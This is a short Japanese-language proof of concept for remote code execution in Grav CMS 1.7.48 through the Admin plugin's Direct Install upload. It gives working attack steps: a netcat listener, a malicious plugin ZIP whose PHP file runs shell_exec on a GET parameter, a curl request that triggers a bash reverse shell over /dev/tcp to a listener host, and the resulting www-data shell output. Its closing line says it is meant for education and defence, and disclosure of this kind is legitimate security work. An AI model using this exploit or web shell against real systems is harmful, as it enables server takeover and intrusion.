
Grav CMS v1.7.48 および Admin Plugin v1.10.48 は、「Direct Install」プラグインアップロード機能を介した**リモートコード実行(RCE)**に対して脆弱であり、認証済みの管理者がサーバー上で任意のPHPコードを実行できる可能性があります。
/admin/tools/direct-install(管理パネル > ツール > Direct Install)リスナーを準備します:
nc -lvnp 4444
管理者としてGrav Admin Panelにログインします。
Tools > Direct Install に移動します。
次の構造を持つ悪意のあるプラグインZIP(evilplugin.zip)をアップロードします:
evilplugin/
├── evilplugin.php ← contains: shell_exec($_GET['cmd'])
└── blueprints.yaml ← minimal blueprint to pass validation
リバースシェルをトリガーします:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
リバースシェルを受信します:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-install教育および防御目的のみに使用してください。